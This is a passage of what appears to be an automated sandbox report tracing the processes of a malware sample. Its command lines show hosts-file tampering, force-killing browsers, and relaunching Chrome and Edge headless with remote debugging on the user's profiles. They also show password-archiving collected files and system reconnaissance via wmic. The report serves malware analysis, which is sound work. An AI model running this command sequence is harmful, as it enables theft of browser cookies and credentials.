                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:43
                                                                                                                                                                                                                                                    Start time:23:57:17
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:attrib -r C:\Windows\System32\drivers\etc\hosts
                                                                                                                                                                                                                                                    Imagebase:0x7ff7bd2b0000
                                                                                                                                                                                                                                                    File size:23'040 bytes
                                                                                                                                                                                                                                                    MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:44
                                                                                                                                                                                                                                                    Start time:23:57:17
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                                                                                                                                                                                                                                    Imagebase:0x7ff650cc0000
                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:45
                                                                                                                                                                                                                                                    Start time:23:57:17
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:46
                                                                                                                                                                                                                                                    Start time:23:57:17
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:attrib +r C:\Windows\System32\drivers\etc\hosts
                                                                                                                                                                                                                                                    Imagebase:0x7ff7bd2b0000
                                                                                                                                                                                                                                                    File size:23'040 bytes
                                                                                                                                                                                                                                                    MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:47
                                                                                                                                                                                                                                                    Start time:23:57:17
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                                    Imagebase:0x7ff650cc0000
                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:48
                                                                                                                                                                                                                                                    Start time:23:57:17
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:49
                                                                                                                                                                                                                                                    Start time:23:57:17
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\33ajg45c\33ajg45c.cmdline"
                                                                                                                                                                                                                                                    Imagebase:0x7ff614620000
                                                                                                                                                                                                                                                    File size:2'759'232 bytes
                                                                                                                                                                                                                                                    MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:50
                                                                                                                                                                                                                                                    Start time:23:57:17
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                                    Imagebase:0x7ff62a660000
                                                                                                                                                                                                                                                    File size:106'496 bytes
                                                                                                                                                                                                                                                    MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:51
                                                                                                                                                                                                                                                    Start time:23:57:18
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6698.tmp" "c:\Users\user\AppData\Local\Temp\33ajg45c\CSCD665F1311EED4D7D921539AB761843.TMP"
                                                                                                                                                                                                                                                    Imagebase:0x7ff6c6590000
                                                                                                                                                                                                                                                    File size:52'744 bytes
                                                                                                                                                                                                                                                    MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:52
                                                                                                                                                                                                                                                    Start time:23:57:18
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"
                                                                                                                                                                                                                                                    Imagebase:0x7ff650cc0000
                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:53
                                                                                                                                                                                                                                                    Start time:23:57:18
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
                                                                                                                                                                                                                                                    Imagebase:0x7ff650cc0000
                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:54
                                                                                                                                                                                                                                                    Start time:23:57:18
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:55
                                                                                                                                                                                                                                                    Start time:23:57:18
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:56
                                                                                                                                                                                                                                                    Start time:23:57:18
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:taskkill /F /IM msedge.exe
                                                                                                                                                                                                                                                    Imagebase:0x7ff63bdc0000
                                                                                                                                                                                                                                                    File size:101'376 bytes
                                                                                                                                                                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:57
                                                                                                                                                                                                                                                    Start time:23:57:18
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:taskkill /F /IM chrome.exe
                                                                                                                                                                                                                                                    Imagebase:0x7ff63bdc0000
                                                                                                                                                                                                                                                    File size:101'376 bytes
                                                                                                                                                                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:58
                                                                                                                                                                                                                                                    Start time:23:57:19
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --restore-last-session --remote-debugging-port=1111 --remote-allow-origins=* "--user-data-dir=C:\Users\user\AppData\Local\google\chrome\User Data" --profile-directory=Default https://www.google.com
                                                                                                                                                                                                                                                    Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                    File size:3'242'272 bytes
                                                                                                                                                                                                                                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:59
                                                                                                                                                                                                                                                    Start time:23:57:19
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --headless --restore-last-session --remote-debugging-port=2223 --remote-allow-origins=* "--user-data-dir=C:\Users\user\AppData\Local/Microsoft/Edge/User Data" https://www.google.com
                                                                                                                                                                                                                                                    Imagebase:0x7ff67dcd0000
                                                                                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                                                                                    MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:60
                                                                                                                                                                                                                                                    Start time:23:57:20
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                                                    Imagebase:0x7ff6eef20000
                                                                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                    Target ID:61
                                                                                                                                                                                                                                                    Start time:23:57:20
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=2424 --field-trial-handle=1428,i,10138126548580973783,13072940522587371912,262144 --disable-features=PaintHolding /prefetch:3
                                                                                                                                                                                                                                                    Imagebase:0x7ff67dcd0000
                                                                                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                                                                                    MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:62
                                                                                                                                                                                                                                                    Start time:23:57:20
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=2384 --field-trial-handle=1596,i,5917360806848576916,10320061818208395364,262144 --disable-features=PaintHolding /prefetch:8
                                                                                                                                                                                                                                                    Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                    File size:3'242'272 bytes
                                                                                                                                                                                                                                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:64
                                                                                                                                                                                                                                                    Start time:23:57:23
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:65
                                                                                                                                                                                                                                                    Start time:23:57:23
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"
                                                                                                                                                                                                                                                    Imagebase:0x7ff650cc0000
                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:66
                                                                                                                                                                                                                                                    Start time:23:57:23
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:67
                                                                                                                                                                                                                                                    Start time:23:57:23
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
                                                                                                                                                                                                                                                    Imagebase:0x7ff650cc0000
                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:68
                                                                                                                                                                                                                                                    Start time:23:57:23
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:69
                                                                                                                                                                                                                                                    Start time:23:57:23
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:taskkill /F /IM msedge.exe
                                                                                                                                                                                                                                                    Imagebase:0x7ff63bdc0000
                                                                                                                                                                                                                                                    File size:101'376 bytes
                                                                                                                                                                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:70
                                                                                                                                                                                                                                                    Start time:23:57:23
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:taskkill /F /IM chrome.exe
                                                                                                                                                                                                                                                    Imagebase:0x7ff63bdc0000
                                                                                                                                                                                                                                                    File size:101'376 bytes
                                                                                                                                                                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:71
                                                                                                                                                                                                                                                    Start time:23:57:28
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe a -r -hp"1" "C:\Users\user\AppData\Local\Temp\WE9Ml.zip" *"
                                                                                                                                                                                                                                                    Imagebase:0x7ff650cc0000
                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:72
                                                                                                                                                                                                                                                    Start time:23:57:28
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:73
                                                                                                                                                                                                                                                    Start time:23:57:28
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe a -r -hp"1" "C:\Users\user\AppData\Local\Temp\WE9Ml.zip" *
                                                                                                                                                                                                                                                    Imagebase:0x7ff77d1f0000
                                                                                                                                                                                                                                                    File size:630'736 bytes
                                                                                                                                                                                                                                                    MD5 hash:9C223575AE5B9544BC3D69AC6364F75E
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                                                                    • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:74
                                                                                                                                                                                                                                                    Start time:23:57:29
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                                                                                                                                                                                                    Imagebase:0x7ff650cc0000
                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:75
                                                                                                                                                                                                                                                    Start time:23:57:30
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:76
                                                                                                                                                                                                                                                    Start time:23:57:30
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:wmic os get Caption
                                                                                                                                                                                                                                                    Imagebase:0x7ff6d7c90000
                                                                                                                                                                                                                                                    File size:576'000 bytes
                                                                                                                                                                                                                                                    MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:77
                                                                                                                                                                                                                                                    Start time:23:57:30
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                                                                                                                                                                                                    Imagebase:0x7ff650cc0000
                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

